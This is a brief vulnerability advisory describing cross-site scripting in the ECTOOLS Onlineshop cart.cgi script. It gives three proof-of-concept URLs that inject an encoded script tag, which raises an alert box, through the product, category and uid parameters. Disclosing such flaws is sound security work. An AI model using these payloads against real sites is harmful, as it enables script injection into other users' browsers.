|
|
ECTOOLS Onlineshop Cross-Site Scripting Vulnerability
No exploit is required. The following proof of concept examples are available: http://www.example.com/cart.cgi?action=link&product=%22%3E%3Cscri pt%3Ealert('r0t')%3C/script%3E http://www.example.com/cart.cgi?action=search&category=%22%3E%3Cs cript%3Ealert('r0t')%3C/script%3E http://www.example.com/cart.cgi?action=link&product=33&uid=%22%3E %3Cscript%3Ealert('r0t')%3C/script%3E |
|
Privacy Statement |